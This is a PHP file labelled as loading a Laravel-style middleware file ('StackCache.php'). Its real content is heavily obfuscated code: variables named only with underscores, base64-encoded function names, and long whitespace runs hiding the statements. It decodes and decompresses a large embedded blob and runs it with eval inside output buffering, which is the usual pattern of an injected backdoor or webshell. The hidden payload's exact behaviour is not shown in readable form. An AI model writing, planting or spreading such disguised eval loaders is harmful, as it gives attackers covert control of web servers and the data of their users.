<?php 
        $__='printf';$_='Loading app/Http/Middleware/StackCache.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
